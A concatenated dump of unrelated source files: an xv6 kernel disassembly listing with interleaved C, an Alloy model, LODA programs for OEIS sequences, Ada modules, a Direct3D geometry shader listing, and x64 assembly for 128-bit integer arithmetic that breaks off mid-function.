89 e5 mov %esp,%ebp 80106ef3: 56 push %esi 80106ef4: 53 push %ebx pde_t *pgdir; struct kmap *k; if((pgdir = (pde_t*)kalloc()) == 0) 80106ef5: e8 96 b5 ff ff call 80102490 <kalloc> 80106efa: 85 c0 test %eax,%eax 80106efc: 74 6a je 80106f68 <setupkvm+0x78> return 0; memset(pgdir, 0, PGSIZE); 80106efe: 83 ec 04 sub $0x4,%esp 80106f01: 89 c6 mov %eax,%esi if (P2V(PHYSTOP) > (void*)DEVSPACE) panic("PHYSTOP too high"); for(k = kmap; k < &kmap[NELEM(kmap)]; k++) 80106f03: bb 20 a4 10 80 mov $0x8010a420,%ebx pde_t *pgdir; struct kmap *k; if((pgdir = (pde_t*)kalloc()) == 0) return 0; memset(pgdir, 0, PGSIZE); 80106f08: 68 00 10 00 00 push $0x1000 80106f0d: 6a 00 push $0x0 80106f0f: 50 push %eax 80106f10: e8 7b d7 ff ff call 80104690 <memset> 80106f15: 83 c4 10 add $0x10,%esp if (P2V(PHYSTOP) > (void*)DEVSPACE) panic("PHYSTOP too high"); for(k = kmap; k < &kmap[NELEM(kmap)]; k++) if(mappages(pgdir, k->virt, k->phys_end - k->phys_start, 80106f18: 8b 43 04 mov 0x4(%ebx),%eax 80106f1b: 8b 4b 08 mov 0x8(%ebx),%ecx 80106f1e: 83 ec 08 sub $0x8,%esp 80106f21: 8b 13 mov (%ebx),%edx 80106f23: ff 73 0c pushl 0xc(%ebx) 80106f26: 50 push %eax 80106f27: 29 c1 sub %eax,%ecx 80106f29: 89 f0 mov %esi,%eax 80106f2b: e8 20 f9 ff ff call 80106850 <mappages> 80106f30: 83 c4 10 add $0x10,%esp 80106f33: 85 c0 test %eax,%eax 80106f35: 78 19 js 80106f50 <setupkvm+0x60> if((pgdir = (pde_t*)kalloc()) == 0) return 0; memset(pgdir, 0, PGSIZE); if (P2V(PHYSTOP) > (void*)DEVSPACE) panic("PHYSTOP too high"); for(k = kmap; k < &kmap[NELEM(kmap)]; k++) 80106f37: 83 c3 10 add $0x10,%ebx 80106f3a: 81 fb 60 a4 10 80 cmp $0x8010a460,%ebx 80106f40: 75 d6 jne 80106f18 <setupkvm+0x28> 80106f42: 89 f0 mov %esi,%eax (uint)k->phys_start, k->perm) < 0) { freevm(pgdir); return 0; } return pgdir; } 80106f44: 8d 65 f8 lea -0x8(%ebp),%esp 80106f47: 5b pop %ebx 80106f48: 5e pop %esi 80106f49: 5d pop %ebp 80106f4a: c3 ret 80106f4b: 90 nop 80106f4c: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi if (P2V(PHYSTOP) > (void*)DEVSPACE) panic("PHYSTOP too high"); for(k = kmap; k < &kmap[NELEM(kmap)]; k++) if(mappages(pgdir, k->virt, k->phys_end - k->phys_start, (uint)k->phys_start, k->perm) < 0) { freevm(pgdir); 80106f50: 83 ec 0c sub $0xc,%esp 80106f53: 56 push %esi 80106f54: e8 17 ff ff ff call 80106e70 <freevm> return 0; 80106f59: 83 c4 10 add $0x10,%esp } return pgdir; } 80106f5c: 8d 65 f8 lea -0x8(%ebp),%esp panic("PHYSTOP too high"); for(k = kmap; k < &kmap[NELEM(kmap)]; k++) if(mappages(pgdir, k->virt, k->phys_end - k->phys_start, (uint)k->phys_start, k->perm) < 0) { freevm(pgdir); return 0; 80106f5f: 31 c0 xor %eax,%eax } return pgdir; } 80106f61: 5b pop %ebx 80106f62: 5e pop %esi 80106f63: 5d pop %ebp 80106f64: c3 ret 80106f65: 8d 76 00 lea 0x0(%esi),%esi { pde_t *pgdir; struct kmap *k; if((pgdir = (pde_t*)kalloc()) == 0) return 0; 80106f68: 31 c0 xor %eax,%eax 80106f6a: eb d8 jmp 80106f44 <setupkvm+0x54> 80106f6c: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 80106f70 <kvmalloc>: // Allocate one page table for the machine for the kernel address // space for scheduler processes. void kvmalloc(void) { 80106f70: 55 push %ebp 80106f71: 89 e5 mov %esp,%ebp 80106f73: 83 ec 08 sub $0x8,%esp kpgdir = setupkvm(); 80106f76: e8 75 ff ff ff call 80106ef0 <setupkvm> 80106f7b: a3 b0 64 11 80 mov %eax,0x801164b0 80106f80: 05 00 00 00 80 add $0x80000000,%eax 80106f85: 0f 22 d8 mov %eax,%cr3 switchkvm(); } 80106f88: c9 leave 80106f89: c3 ret 80106f8a: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 80106f90 <clearpteu>: // Clear PTE_U on a page. Used to create an inaccessible // page beneath the user stack. void clearpteu(pde_t *pgdir, char *uva) { 80106f90: 55 push %ebp pte_t *pte; pte = walkpgdir(pgdir, uva, 0); 80106f91: 31 c9 xor %ecx,%ecx // Clear PTE_U on a page. Used to create an inaccessible // page beneath the user stack. void clearpteu(pde_t *pgdir, char *uva) { 80106f93: 89 e5 mov %esp,%ebp 80106f95: 83 ec 08 sub $0x8,%esp pte_t *pte; pte = walkpgdir(pgdir, uva, 0); 80106f98: 8b 55 0c mov 0xc(%ebp),%edx 80106f9b: 8b 45 08 mov 0x8(%ebp),%eax 80106f9e: e8 2d f8 ff ff call 801067d0 <walkpgdir> if(pte == 0) 80106fa3: 85 c0 test %eax,%eax 80106fa5: 74 05 je 80106fac <clearpteu+0x1c> panic("clearpteu"); *pte &= ~PTE_U; 80106fa7: 83 20 fb andl $0xfffffffb,(%eax) } 80106faa: c9 leave 80106fab: c3 ret { pte_t *pte; pte = walkpgdir(pgdir, uva, 0); if(pte == 0) panic("clearpteu"); 80106fac: 83 ec 0c sub $0xc,%esp 80106faf: 68 2e 7c 10 80 push $0x80107c2e 80106fb4: e8 b7 93 ff ff call 80100370 <panic> 80106fb9: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 80106fc0 <copyuvm>: // Given a parent process's page table, create a copy // of it for a child. pde_t* copyuvm(pde_t *pgdir, uint sz) { 80106fc0: 55 push %ebp 80106fc1: 89 e5 mov %esp,%ebp 80106fc3: 57 push %edi 80106fc4: 56 push %esi 80106fc5: 53 push %ebx 80106fc6: 83 ec 1c sub $0x1c,%esp pde_t *d; pte_t *pte; uint pa, i, flags; char *mem; if((d = setupkvm()) == 0) 80106fc9: e8 22 ff ff ff call 80106ef0 <setupkvm> 80106fce: 85 c0 test %eax,%eax 80106fd0: 89 45 e0 mov %eax,-0x20(%ebp) 80106fd3: 0f 84 b2 00 00 00 je 8010708b <copyuvm+0xcb> return 0; for(i = 0; i < sz; i += PGSIZE){ 80106fd9: 8b 4d 0c mov 0xc(%ebp),%ecx 80106fdc: 85 c9 test %ecx,%ecx 80106fde: 0f 84 9c 00 00 00 je 80107080 <copyuvm+0xc0> 80106fe4: 31 f6 xor %esi,%esi 80106fe6: eb 4a jmp 80107032 <copyuvm+0x72> 80106fe8: 90 nop 80106fe9: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi panic("copyuvm: page not present"); pa = PTE_ADDR(*pte); flags = PTE_FLAGS(*pte); if((mem = kalloc()) == 0) goto bad; memmove(mem, (char*)P2V(pa), PGSIZE); 80106ff0: 83 ec 04 sub $0x4,%esp 80106ff3: 81 c7 00 00 00 80 add $0x80000000,%edi 80106ff9: 68 00 10 00 00 push $0x1000 80106ffe: 57 push %edi 80106fff: 50 push %eax 80107000: e8 3b d7 ff ff call 80104740 <memmove> if(mappages(d, (void*)i, PGSIZE, V2P(mem), flags) < 0) 80107005: 58 pop %eax 80107006: 5a pop %edx 80107007: 8d 93 00 00 00 80 lea -0x80000000(%ebx),%edx 8010700d: 8b 45 e0 mov -0x20(%ebp),%eax 80107010: ff 75 e4 pushl -0x1c(%ebp) 80107013: b9 00 10 00 00 mov $0x1000,%ecx 80107018: 52 push %edx 80107019: 89 f2 mov %esi,%edx 8010701b: e8 30 f8 ff ff call 80106850 <mappages> 80107020: 83 c4 10 add $0x10,%esp 80107023: 85 c0 test %eax,%eax 80107025: 78 3e js 80107065 <copyuvm+0xa5> uint pa, i, flags; char *mem; if((d = setupkvm()) == 0) return 0; for(i = 0; i < sz; i += PGSIZE){ 80107027: 81 c6 00 10 00 00 add $0x1000,%esi 8010702d: 39 75 0c cmp %esi,0xc(%ebp) 80107030: 76 4e jbe 80107080 <copyuvm+0xc0> if((pte = walkpgdir(pgdir, (void *) i, 0)) == 0) 80107032: 8b 45 08 mov 0x8(%ebp),%eax 80107035: 31 c9 xor %ecx,%ecx 80107037: 89 f2 mov %esi,%edx 80107039: e8 92 f7 ff ff call 801067d0 <walkpgdir> 8010703e: 85 c0 test %eax,%eax 80107040: 74 5a je 8010709c <copyuvm+0xdc> panic("copyuvm: pte should exist"); if(!(*pte & PTE_P)) 80107042: 8b 18 mov (%eax),%ebx 80107044: f6 c3 01 test $0x1,%bl 80107047: 74 46 je 8010708f <copyuvm+0xcf> panic("copyuvm: page not present"); pa = PTE_ADDR(*pte); 80107049: 89 df mov %ebx,%edi flags = PTE_FLAGS(*pte); 8010704b: 81 e3 ff 0f 00 00 and $0xfff,%ebx 80107051: 89 5d e4 mov %ebx,-0x1c(%ebp) for(i = 0; i < sz; i += PGSIZE){ if((pte = walkpgdir(pgdir, (void *) i, 0)) == 0) panic("copyuvm: pte should exist"); if(!(*pte & PTE_P)) panic("copyuvm: page not present"); pa = PTE_ADDR(*pte); 80107054: 81 e7 00 f0 ff ff and $0xfffff000,%edi flags = PTE_FLAGS(*pte); if((mem = kalloc()) == 0) 8010705a: e8 31 b4 ff ff call 80102490 <kalloc> 8010705f: 85 c0 test %eax,%eax 80107061: 89 c3 mov %eax,%ebx 80107063: 75 8b jne 80106ff0 <copyuvm+0x30> goto bad; } return d; bad: freevm(d); 80107065: 83 ec 0c sub $0xc,%esp 80107068: ff 75 e0 pushl -0x20(%ebp) 8010706b: e8 00 fe ff ff call 80106e70 <freevm> return 0; 80107070: 83 c4 10 add $0x10,%esp 80107073: 31 c0 xor %eax,%eax } 80107075: 8d 65 f4 lea -0xc(%ebp),%esp 80107078: 5b pop %ebx 80107079: 5e pop %esi 8010707a: 5f pop %edi 8010707b: 5d pop %ebp 8010707c: c3 ret 8010707d: 8d 76 00 lea 0x0(%esi),%esi uint pa, i, flags; char *mem; if((d = setupkvm()) == 0) return 0; for(i = 0; i < sz; i += PGSIZE){ 80107080: 8b 45 e0 mov -0x20(%ebp),%eax return d; bad: freevm(d); return 0; } 80107083: 8d 65 f4 lea -0xc(%ebp),%esp 80107086: 5b pop %ebx 80107087: 5e pop %esi 80107088: 5f pop %edi 80107089: 5d pop %ebp 8010708a: c3 ret pte_t *pte; uint pa, i, flags; char *mem; if((d = setupkvm()) == 0) return 0; 8010708b: 31 c0 xor %eax,%eax 8010708d: eb e6 jmp 80107075 <copyuvm+0xb5> for(i = 0; i < sz; i += PGSIZE){ if((pte = walkpgdir(pgdir, (void *) i, 0)) == 0) panic("copyuvm: pte should exist"); if(!(*pte & PTE_P)) panic("copyuvm: page not present"); 8010708f: 83 ec 0c sub $0xc,%esp 80107092: 68 52 7c 10 80 push $0x80107c52 80107097: e8 d4 92 ff ff call 80100370 <panic> if((d = setupkvm()) == 0) return 0; for(i = 0; i < sz; i += PGSIZE){ if((pte = walkpgdir(pgdir, (void *) i, 0)) == 0) panic("copyuvm: pte should exist"); 8010709c: 83 ec 0c sub $0xc,%esp 8010709f: 68 38 7c 10 80 push $0x80107c38 801070a4: e8 c7 92 ff ff call 80100370 <panic> 801070a9: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 801070b0 <uva2ka>: //PAGEBREAK! // Map user virtual address to kernel address. char* uva2ka(pde_t *pgdir, char *uva) { 801070b0: 55 push %ebp pte_t *pte; pte = walkpgdir(pgdir, uva, 0); 801070b1: 31 c9 xor %ecx,%ecx //PAGEBREAK! // Map user virtual address to kernel address. char* uva2ka(pde_t *pgdir, char *uva) { 801070b3: 89 e5 mov %esp,%ebp 801070b5: 83 ec 08 sub $0x8,%esp pte_t *pte; pte = walkpgdir(pgdir, uva, 0); 801070b8: 8b 55 0c mov 0xc(%ebp),%edx 801070bb: 8b 45 08 mov 0x8(%ebp),%eax 801070be: e8 0d f7 ff ff call 801067d0 <walkpgdir> if((*pte & PTE_P) == 0) 801070c3: 8b 00 mov (%eax),%eax return 0; if((*pte & PTE_U) == 0) 801070c5: 89 c2 mov %eax,%edx 801070c7: 83 e2 05 and $0x5,%edx 801070ca: 83 fa 05 cmp $0x5,%edx 801070cd: 75 11 jne 801070e0 <uva2ka+0x30> return 0; return (char*)P2V(PTE_ADDR(*pte)); 801070cf: 25 00 f0 ff ff and $0xfffff000,%eax } 801070d4: c9 leave pte = walkpgdir(pgdir, uva, 0); if((*pte & PTE_P) == 0) return 0; if((*pte & PTE_U) == 0) return 0; return (char*)P2V(PTE_ADDR(*pte)); 801070d5: 05 00 00 00 80 add $0x80000000,%eax } 801070da: c3 ret 801070db: 90 nop 801070dc: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi pte = walkpgdir(pgdir, uva, 0); if((*pte & PTE_P) == 0) return 0; if((*pte & PTE_U) == 0) return 0; 801070e0: 31 c0 xor %eax,%eax return (char*)P2V(PTE_ADDR(*pte)); } 801070e2: c9 leave 801070e3: c3 ret 801070e4: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 801070ea: 8d bf 00 00 00 00 lea 0x0(%edi),%edi 801070f0 <copyout>: // Copy len bytes from p to user address va in page table pgdir. // Most useful when pgdir is not the current page table. // uva2ka ensures this only works for PTE_U pages. int copyout(pde_t *pgdir, uint va, void *p, uint len) { 801070f0: 55 push %ebp 801070f1: 89 e5 mov %esp,%ebp 801070f3: 57 push %edi 801070f4: 56 push %esi 801070f5: 53 push %ebx 801070f6: 83 ec 1c sub $0x1c,%esp 801070f9: 8b 5d 14 mov 0x14(%ebp),%ebx 801070fc: 8b 55 0c mov 0xc(%ebp),%edx 801070ff: 8b 7d 10 mov 0x10(%ebp),%edi char *buf, *pa0; uint n, va0; buf = (char*)p; while(len > 0){ 80107102: 85 db test %ebx,%ebx 80107104: 75 40 jne 80107146 <copyout+0x56> 80107106: eb 70 jmp 80107178 <copyout+0x88> 80107108: 90 nop 80107109: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi va0 = (uint)PGROUNDDOWN(va); pa0 = uva2ka(pgdir, (char*)va0); if(pa0 == 0) return -1; n = PGSIZE - (va - va0); 80107110: 8b 55 e4 mov -0x1c(%ebp),%edx 80107113: 89 f1 mov %esi,%ecx 80107115: 29 d1 sub %edx,%ecx 80107117: 81 c1 00 10 00 00 add $0x1000,%ecx 8010711d: 39 d9 cmp %ebx,%ecx 8010711f: 0f 47 cb cmova %ebx,%ecx if(n > len) n = len; memmove(pa0 + (va - va0), buf, n); 80107122: 29 f2 sub %esi,%edx 80107124: 83 ec 04 sub $0x4,%esp 80107127: 01 d0 add %edx,%eax 80107129: 51 push %ecx 8010712a: 57 push %edi 8010712b: 50 push %eax 8010712c: 89 4d e4 mov %ecx,-0x1c(%ebp) 8010712f: e8 0c d6 ff ff call 80104740 <memmove> len -= n; buf += n; 80107134: 8b 4d e4 mov -0x1c(%ebp),%ecx { char *buf, *pa0; uint n, va0; buf = (char*)p; while(len > 0){ 80107137: 83 c4 10 add $0x10,%esp if(n > len) n = len; memmove(pa0 + (va - va0), buf, n); len -= n; buf += n; va = va0 + PGSIZE; 8010713a: 8d 96 00 10 00 00 lea 0x1000(%esi),%edx n = PGSIZE - (va - va0); if(n > len) n = len; memmove(pa0 + (va - va0), buf, n); len -= n; buf += n; 80107140: 01 cf add %ecx,%edi { char *buf, *pa0; uint n, va0; buf = (char*)p; while(len > 0){ 80107142: 29 cb sub %ecx,%ebx 80107144: 74 32 je 80107178 <copyout+0x88> va0 = (uint)PGROUNDDOWN(va); 80107146: 89 d6 mov %edx,%esi pa0 = uva2ka(pgdir, (char*)va0); 80107148: 83 ec 08 sub $0x8,%esp char *buf, *pa0; uint n, va0; buf = (char*)p; while(len > 0){ va0 = (uint)PGROUNDDOWN(va); 8010714b: 89 55 e4 mov %edx,-0x1c(%ebp) 8010714e: 81 e6 00 f0 ff ff and $0xfffff000,%esi pa0 = uva2ka(pgdir, (char*)va0); 80107154: 56 push %esi 80107155: ff 75 08 pushl 0x8(%ebp) 80107158: e8 53 ff ff ff call 801070b0 <uva2ka> if(pa0 == 0) 8010715d: 83 c4 10 add $0x10,%esp 80107160: 85 c0 test %eax,%eax 80107162: 75 ac jne 80107110 <copyout+0x20> len -= n; buf += n; va = va0 + PGSIZE; } return 0; } 80107164: 8d 65 f4 lea -0xc(%ebp),%esp buf = (char*)p; while(len > 0){ va0 = (uint)PGROUNDDOWN(va); pa0 = uva2ka(pgdir, (char*)va0); if(pa0 == 0) return -1; 80107167: b8 ff ff ff ff mov $0xffffffff,%eax len -= n; buf += n; va = va0 + PGSIZE; } return 0; } 8010716c: 5b pop %ebx 8010716d: 5e pop %esi 8010716e: 5f pop %edi 8010716f: 5d pop %ebp 80107170: c3 ret 80107171: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 80107178: 8d 65 f4 lea -0xc(%ebp),%esp memmove(pa0 + (va - va0), buf, n); len -= n; buf += n; va = va0 + PGSIZE; } return 0; 8010717b: 31 c0 xor %eax,%eax } 8010717d: 5b pop %ebx 8010717e: 5e pop %esi 8010717f: 5f pop %edi 80107180: 5d pop %ebp 80107181: c3 ret
alloy4fun_models/trainstlt/models/4/qT5Proi28HkXL3ZGs.als
Kaixi26/org.alloytools.alloy
0
3621
open main pred idqT5Proi28HkXL3ZGs_prop5 { always (all t:pos.Track | (t.pos)' in t.pos + t.pos.prox or (t.pos in Exit and (t.pos)' in t.pos)) } pred __repair { idqT5Proi28HkXL3ZGs_prop5 } check __repair { idqT5Proi28HkXL3ZGs_prop5 <=> prop5o }
oeis/226/A226784.asm
neoneye/loda-programs
11
20960
<filename>oeis/226/A226784.asm ; A226784: If gcd(n,6) != 1 then a(n)=0, otherwise a(n)=6^(-1) in Z/nZ*. ; Submitted by <NAME> ; 0,0,0,0,1,0,6,0,0,0,2,0,11,0,0,0,3,0,16,0,0,0,4,0,21,0,0,0,5,0,26,0,0,0,6,0,31,0,0,0,7,0,36,0,0,0,8,0,41,0,0,0,9,0,46,0,0,0,10,0,51,0,0,0,11,0,56,0,0,0,12,0,61,0,0,0,13,0,66,0,0,0,14,0,71,0,0,0,15,0,76,0,0,0,16,0,81,0,0,0 add $0,1 mov $3,$0 mov $4,$0 mul $0,2 mov $5,1 lpb $3 cmp $0,$5 mov $2,$0 cmp $2,0 sub $3,$2 add $5,6 mod $5,$4 lpe mov $0,$3
example/src/example_3.adb
Heziode/ada-dotenv
6
29120
with Ada.Environment_Variables; with Print_Variable; with Load_Environment_Variables; with Ada.Text_IO; procedure Example_3 is begin Ada.Text_IO.Put_Line ("Start main"); Ada.Environment_Variables.Iterate (Print_Variable'Access); end Example_3;
awa/samples/src/atlas-reviews-modules.adb
Letractively/ada-awa
7
1648
<filename>awa/samples/src/atlas-reviews-modules.adb ----------------------------------------------------------------------- -- atlas-reviews-modules -- Module reviews -- Copyright (C) 2014 Stephane.Carrez -- Written by Stephane.Carrez (<EMAIL>) -- -- Licensed under the Apache License, Version 2.0 (the "License"); -- you may not use this file except in compliance with the License. -- You may obtain a copy of the License at -- -- http://www.apache.org/licenses/LICENSE-2.0 -- -- Unless required by applicable law or agreed to in writing, software -- distributed under the License is distributed on an "AS IS" BASIS, -- WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -- See the License for the specific language governing permissions and -- limitations under the License. ----------------------------------------------------------------------- with Ada.Calendar; with AWA.Modules.Beans; with AWA.Modules.Get; with Util.Log.Loggers; with Atlas.Reviews.Beans; with ADO.Sessions; with AWA.Services.Contexts; with AWA.Permissions; package body Atlas.Reviews.Modules is package ASC renames AWA.Services.Contexts; Log : constant Util.Log.Loggers.Logger := Util.Log.Loggers.Create ("Atlas.Reviews.Module"); package Register is new AWA.Modules.Beans (Module => Review_Module, Module_Access => Review_Module_Access); -- ------------------------------ -- Initialize the reviews module. -- ------------------------------ overriding procedure Initialize (Plugin : in out Review_Module; App : in AWA.Modules.Application_Access; Props : in ASF.Applications.Config) is begin Log.Info ("Initializing the reviews module"); -- Register here any bean class, servlet, filter. Register.Register (Plugin => Plugin, Name => "Atlas.Reviews.Beans.Reviews_Bean", Handler => Atlas.Reviews.Beans.Create_Review_Bean'Access); Register.Register (Plugin => Plugin, Name => "Atlas.Reviews.Beans.Review_List_Bean", Handler => Atlas.Reviews.Beans.Create_Review_List_Bean'Access); AWA.Modules.Module (Plugin).Initialize (App, Props); -- Add here the creation of manager instances. end Initialize; -- ------------------------------ -- Get the reviews module. -- ------------------------------ function Get_Review_Module return Review_Module_Access is function Get is new AWA.Modules.Get (Review_Module, Review_Module_Access, NAME); begin return Get; end Get_Review_Module; -- ------------------------------ -- Save the review. -- ------------------------------ procedure Save (Model : in Review_Module; Entity : in out Atlas.Reviews.Models.Review_Ref'Class) is pragma Unreferenced (Model); Ctx : constant ASC.Service_Context_Access := ASC.Current; DB : ADO.Sessions.Master_Session := AWA.Services.Contexts.Get_Master_Session (Ctx); begin Ctx.Start; if not Entity.Is_Inserted then AWA.Permissions.Check (Permission => ACL_Create_Reviews.Permission); Entity.Set_Reviewer (Ctx.Get_User); Entity.Set_Create_Date (Ada.Calendar.Clock); else AWA.Permissions.Check (Permission => ACL_Update_Reviews.Permission, Entity => Entity); end if; Entity.Save (DB); Ctx.Commit; end Save; -- ------------------------------ -- Delete the review. -- ------------------------------ procedure Delete (Model : in Review_Module; Entity : in out Atlas.Reviews.Models.Review_Ref'Class) is pragma Unreferenced (Model); Ctx : constant ASC.Service_Context_Access := ASC.Current; DB : ADO.Sessions.Master_Session := ASC.Get_Master_Session (Ctx); begin AWA.Permissions.Check (Permission => ACL_Delete_Reviews.Permission, Entity => Entity); Ctx.Start; Entity.Delete (DB); Ctx.Commit; end Delete; end Atlas.Reviews.Modules;
programs/oeis/081/A081441.asm
neoneye/loda
22
5253
; A081441: a(n) = (2*n^3 - n^2 - n + 2)/2. ; 1,1,6,22,55,111,196,316,477,685,946,1266,1651,2107,2640,3256,3961,4761,5662,6670,7791,9031,10396,11892,13525,15301,17226,19306,21547,23955,26536,29296,32241,35377,38710,42246,45991,49951,54132,58540,63181,68061,73186,78562,84195,90091,96256,102696,109417,116425,123726,131326,139231,147447,155980,164836,174021,183541,193402,203610,214171,225091,236376,248032,260065,272481,285286,298486,312087,326095,340516,355356,370621,386317,402450,419026,436051,453531,471472,489880,508761,528121,547966,568302,589135,610471,632316,654676,677557,700965,724906,749386,774411,799987,826120,852816,880081,907921,936342,965350 mov $1,$0 mul $0,2 bin $1,2 mul $0,$1 add $0,$1 add $0,1
oeis/028/A028196.asm
neoneye/loda-programs
11
244869
<filename>oeis/028/A028196.asm<gh_stars>10-100 ; A028196: Expansion of 1/((1-5x)(1-9x)(1-10x)(1-11x)). ; Submitted by <NAME> ; 1,35,776,13930,221151,3240825,44906926,597218720,7698198101,96837355615,1194615734676,14505367659510,173840151316651,2060770407338405,24205227062904026,282088240414000300,3265447176464616801,37582206965366853195,430364865022642734976,4906658791808049905090,55727054103551935698551,630781861205204615163985,7118658865468264878107526,80125773038129111705837880,899768233021619366408721901,10082913129359582045419534775,112781207516561207514542461676,1259415750517174947197391462670 mov $1,1 mov $2,$0 mov $3,$0 lpb $2 mov $0,$3 sub $2,1 sub $0,$2 seq $0,20982 ; Expansion of 1/((1-9*x)*(1-10*x)*(1-11*x)). sub $0,$1 mul $1,6 add $1,$0 lpe mov $0,$1
src/SlimShader.VirtualMachine.Tests/Shaders/GS/GS_CubeMap_GS.asm
tgjones/slimshader
125
104995
<gh_stars>100-1000 // // Generated by Microsoft (R) HLSL Shader Compiler 9.30.9200.20789 // // /// // Buffer Definitions: // // cbuffer $Globals // { // // float4x4 TransformMatrixArray[6]; // Offset: 0 Size: 384 // // } // // // Resource Bindings: // // Name Type Format Dim Slot Elements // ------------------------------ ---------- ------- ----------- ---- -------- // $Globals cbuffer NA NA 0 1 // // // // Input signature: // // Name Index Mask Register SysValue Format Used // -------------------- ----- ------ -------- -------- ------- ------ // TEXCOORD 0 xyz 0 NONE float xyz // TEXCOORD 1 xyz 1 NONE float xyz // TEXCOORD 2 xyz 2 NONE float xyz // TEXCOORD 3 xy 3 NONE float xy // // // Output signature: // // Name Index Mask Register SysValue Format Used // -------------------- ----- ------ -------- -------- ------- ------ // SV_POSITION 0 xyzw 0 POS float xyzw // TEXCOORD 0 xyz 1 NONE float xyz // TEXCOORD 1 xyz 2 NONE float xyz // TEXCOORD 2 xy 3 NONE float xy // SV_RenderTargetArrayIndex 0 x 4 RTINDEX uint x // gs_4_0 dcl_constantbuffer cb0[24], dynamicIndexed dcl_input v[3][0].xyz dcl_input v[3][1].xyz dcl_input v[3][2].xyz dcl_input v[3][3].xy dcl_temps 2 dcl_inputprimitive triangle dcl_outputtopology trianglestrip dcl_output_siv o0.xyzw, position dcl_output o1.xyz dcl_output o2.xyz dcl_output o3.xy dcl_output_siv o4.x, rendertarget_array_index dcl_maxout 24 mov r0.x, l(0) loop ige r0.y, r0.x, l(6) breakc_nz r0.y ishl r0.y, r0.x, l(2) mov r0.z, l(0) loop ige r0.w, r0.z, l(3) breakc_nz r0.w mul r1.xyzw, cb0[r0.y + 1].xyzw, v[r0.z + 0][0].yyyy mad r1.xyzw, cb0[r0.y + 0].xyzw, v[r0.z + 0][0].xxxx, r1.xyzw mad r1.xyzw, cb0[r0.y + 2].xyzw, v[r0.z + 0][0].zzzz, r1.xyzw add r1.xyzw, r1.xyzw, cb0[r0.y + 3].xyzw mov o0.xyzw, r1.xyzw mov o1.xyz, v[r0.z + 0][1].xyzx mov o2.xyz, v[r0.z + 0][2].xyzx mov o3.xy, v[r0.z + 0][3].xyxx mov o4.x, r0.x emit iadd r0.z, r0.z, l(1) endloop cut iadd r0.x, r0.x, l(1) endloop ret // Approximately 25 instruction slots used
3rdparty/unistd/unistd/unistd/int128/Int128x64.asm
dna2fork/darknet
168
92150
; These functions implements the basic operations for _int128 type ; running on 64-bit intel CPU. ; They are (almost) identical to MS's workhorse-functions that do ; __int64-math using 32-bit registers. Every memory reference that uses ; dword ptr(4 byte) are replaced by qword ptr(8 byte), and registernames ; eax, ebx, ecx... are replaced by rax, rbx, rcx etc. ; Parameters are passed in rcx(1st argument) and rdx(2nd argument) and ; return value is in rax, where the runtime-stack is used in x86 mode. ; So the code is modified to reflect this environment ; .CODE ;void int128add(_int128 &dst, const _int128 &x); do assignop dst += x; int128add PROC mov rax, qword ptr[rdx] add qword ptr[rcx], rax mov rax, qword ptr[rdx+8] adc qword ptr[rcx+8], rax ret int128add ENDP ;void int128sub(_int128 &dst, const _int128 &x); do assignop dst -= x; int128sub PROC mov rax, qword ptr[rdx] sub qword ptr[rcx], rax mov rax, qword ptr[rdx+8] sbb qword ptr[rcx+8], rax ret int128sub ENDP ;void int128mul(_int128 &dst, const _int128 &x); do assignop dst *= x; int128mul PROC push rbx mov rax, qword ptr[rdx+8] ; rax = x.hi mov rbx, qword ptr[rcx+8] ; rbx = dst.hi or rbx, rax ; rbx |= x.hi mov rbx, qword ptr[rcx] ; rbx = dst.lo jne Hard ; if(x.hi|dst.hi) goto Hard ; else simple int64 multiplication mov rax, qword ptr[rdx] ; rax = x.lo mul rbx ; rdx:rax = rax * rbx mov qword ptr[rcx] , rax ; dst.lo = rax mov qword ptr[rcx+8], rdx ; dst.hi = rdx pop rbx ret Hard: ; assume rax = x.hi, rbx = dst.lo push rsi mov rsi, rdx ; need rdx for highend of mul, so rsi = &x mul rbx ; rdx:rax = x.hi*dst.lo mov r9 , rax ; r9 = lo(x.hi*dst.lo) mov rax, qword ptr[rsi] ; rax = x.lo mul qword ptr[rcx+8] ; rdx:rax = x.lo*dst.hi add r9, rax ; r9 += lo(x.lo*dst.hi); mov rax, qword ptr[rsi] ; rax = x.lo mul rbx ; rdx:rax = x.lo*dst.lo add rdx, r9 ; rdx += lo(x.hi*dst.lo) + lo(x.lo*dst.hi) mov qword ptr[rcx] , rax mov qword ptr[rcx+8], rdx pop rsi pop rbx ret int128mul ENDP ;void int128div(_int128 &dst, _int128 &x); do assignop dst /= x; if (x < 0) x = -x; !! int128div PROC push rbx ; push rdi ; push rsi ; mov r8, rcx ; r8 = &dst mov r9, rdx ; r9 = &x xor rdi, rdi ; rdi = 0 mov rax, qword ptr[r8+8] ; check sign of dst or rax, rax ; jge L1 ; if(dst >= 0) goto L1 inc rdi ; rdi++ mov rdx, qword ptr[r8] ; dst is negative. Change sign neg rax ; neg rdx ; sbb rax, 0 ; mov qword ptr[r8+8], rax ; dst = -original dst mov qword ptr[r8], rdx ; L1: ; Assume dst >= 0, rdi = (original dst < 0)1:0 mov rax, qword ptr[r9+8] ; check sign of x or rax, rax ; jge L2 ; inc rdi ; x is negative. change sign, and increment rdi mov rdx, qword ptr[r9] ; neg rax ; neg rdx ; sbb rax, 0 ; mov qword ptr[r9+8], rax ; x = -original x mov qword ptr[r9], rdx ; L2: ; Assume dst >= 0, x > 0, rdi = #original negative arguments or rax, rax ; jne L3 ; mov rcx, qword ptr[r9] ; mov rax, qword ptr[r8+8] ; xor rdx, rdx ; div rcx ; mov rbx, rax ; mov rax, qword ptr[r8] ; div rcx ; mov rdx, rbx ; jmp L4 ; L3: ; mov rbx, rax ; mov rcx, qword ptr[r9] ; mov rdx, qword ptr[r8+8] ; mov rax, qword ptr[r8] ; L5: ; shr rbx, 1 ; rcr rcx, 1 ; shr rdx, 1 ; rcr rax, 1 ; or rbx, rbx ; jne L5 ; div rcx ; mov rsi, rax ; mul qword ptr[r9+8] ; mov rcx, rax ; 